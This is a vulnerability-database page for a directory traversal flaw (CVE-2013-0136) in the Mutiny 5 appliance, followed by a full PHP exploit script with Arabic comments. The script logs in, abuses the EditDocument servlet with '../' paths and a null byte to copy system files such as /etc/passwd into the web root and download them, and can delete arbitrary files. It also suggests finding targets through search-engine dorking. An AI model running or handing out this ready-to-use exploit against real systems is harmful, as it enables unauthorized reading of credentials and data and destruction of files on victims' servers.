📄 Mutiny 5.0-1.07 Directory Traversal

🗓️ 04 Feb 2026 00:00:00Reported by indoushkaType

Mutiny 5.0-1.07 has a directory traversal vulnerability in EditDocument servlet that allows authenticated attackers to read or delete files.

Reporter	Title	Published	Views	Family All 20
0day.today	Mutiny 5 Arbitrary File Upload Vulnerability	16 May 201300:00	–	zdt
Tenable Nessus	Mutiny < 5.0-1.11 Multiple Directory Traversals	21 May 201300:00	–	nessus
Tenable Nessus	Mutiny < 5.0-1.11 Multiple Directory Traversals	17 May 201300:00	–	nessus
ATTACKERKB	CVE-2013-0136	1 Jun 201314:21	–	attackerkb
Circl	CVE-2013-0136	17 May 201300:00	–	circl
Check Point Advisories	Mutiny FrontEnd Arbitrary File Read and Delete (CVE-2013-0136)	29 May 201300:00	–	checkpoint_advisories
Check Point Advisories	Mutiny FrontEnd Arbitrary File Upload (CVE-2013-0136)	5 Jun 201300:00	–	checkpoint_advisories
CVE	CVE-2013-0136	1 Jun 201310:00	–	cve
Cvelist	CVE-2013-0136	1 Jun 201310:00	–	cvelist
Exploit DB	Mutiny 5 - Arbitrary File Upload (Metasploit)	17 May 201300:00	–	exploitdb

=============================================================================================================================================
    | # Title     : Mutiny 5.0-1.07 directory traversal Vulnerability                                                                           |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.mutiny.com/downloads/                                                                                           |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: The code is an exploit written in PHP that targets a vulnerability in the Mutiny 5 Appliance, 
    
        allowing an authenticated attacker (i.e. with a username and password) to read or delete any file on the system due to a Directory Traversal vulnerability in the EditDocument servlet.
       
       (Related : https://packetstorm.news/files/id/180894/ Linked CVE numbers:	CVE-2013-0136 ) .
    	
    [+] save code as poc.php.
    
    [+] Set taget : Line 110.
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class MutinyExploit {
        private $target;
        private $username;
        private $password;
        private $session;
    
        public function __construct($target, $username, $password) {
            $this->target = rtrim($target, '/');
            $this->username = $username;
            $this->password = $password;
        }
    
        private function sendRequest($url, $postFields = null, $cookie = null) {
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    
            if ($postFields) {
                curl_setopt($ch, CURLOPT_POST, true);
                curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
            }
    
            if ($cookie) {
                curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: $cookie"]);
            }
    
            $response = curl_exec($ch);
            curl_close($ch);
            return $response;
        }
    
        public function login() {
            // الحصول على JSESSIONID الأولي
            $response = $this->sendRequest("{$this->target}/interface/index.do");
            if (preg_match('/JSESSIONID=(.*?);/', $response, $matches)) {
                $firstSession = $matches[1];
            } else {
                die("فشل في الحصول على JSESSIONID الأولي\n");
            }
    
            // محاولة تسجيل الدخول
            $postFields = "j_username={$this->username}&j_password={$this->password}";
            $response = $this->sendRequest("{$this->target}/interface/j_security_check", $postFields, "JSESSIONID=$firstSession");
    
            // التحقق مما إذا كان تسجيل الدخول ناجحًا
            if (strpos($response, "interface/index.do") === false) {
                die("فشل تسجيل الدخول، تحقق من بيانات الاعتماد\n");
            }
    
            // الحصول على JSESSIONID النهائي بعد المصادقة
            $response = $this->sendRequest("{$this->target}/interface/index.do", null, "JSESSIONID=$firstSession");
            if (preg_match('/JSESSIONID=(.*?);/', $response, $matches)) {
                $this->session = $matches[1];
                echo "تم تسجيل الدخول بنجاح\n";
            } else {
                die("فشل في الحصول على الجلسة بعد تسجيل الدخول\n");
            }
        }
    
        public function readFile($filePath) {
            echo "نسخ الملف إلى موقع ويب يمكن الوصول إليه...\n";
            $dstPath = "/usr/jakarta/tomcat/webapps/ROOT/m/";
            $postFields = [
                'operation' => 'COPY',
                'paths[]' => "../../../../{$filePath}%00.txt",
                'newPath' => "../../../..{$dstPath}"
            ];
    
            $response = $this->sendRequest("{$this->target}/interface/EditDocument", $postFields, "JSESSIONID={$this->session}");
            if (strpos($response, '{"success":true}') !== false) {
                echo "تم نسخ الملف إلى {$dstPath} بنجاح\n";
            } else {
                die("فشل في نسخ الملف\n");
            }
    
            // قراءة الملف
            echo "استرجاع محتوى الملف...\n";
            $fileContents = $this->sendRequest("{$this->target}/m/" . basename($filePath));
            if ($fileContents) {
                file_put_contents("extracted_" . basename($filePath), $fileContents);
                echo "تم استرجاع الملف وحفظه محليًا\n";
            } else {
                echo "فشل في استرجاع محتوى الملف\n";
            }
    
            // تنظيف الملفات بعد القراءة
            $this->deleteFile("{$dstPath}" . basename($filePath));
        }
    
        public function deleteFile($filePath) {
            echo "حذف الملف {$filePath}\n";
            $postFields = [
                'operation' => 'DELETE',
                'paths[]' => "../../../../{$filePath}"
            ];
    
            $response = $this->sendRequest("{$this->target}/interface/EditDocument", $postFields, "JSESSIONID={$this->session}");
            if (strpos($response, '{"success":true}') !== false) {
                echo "تم حذف الملف بنجاح\n";
            } else {
                echo "فشل في حذف الملف\n";
            }
        }
    }
    
    // استخدام الكود
    $exploit = new MutinyExploit("http://target.com", "[email protected]", "password");
    $exploit->login();
    $exploit->readFile("/etc/passwd"); // مثال على قراءة ملف
    // $exploit->deleteFile("/tmp/test.txt"); // حذف ملف (اختياري)
    
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

04 Feb 2026 00:00Current

5.2Medium risk

Vulners AI Score5.2

CVSS 28.5

EPSS0.7214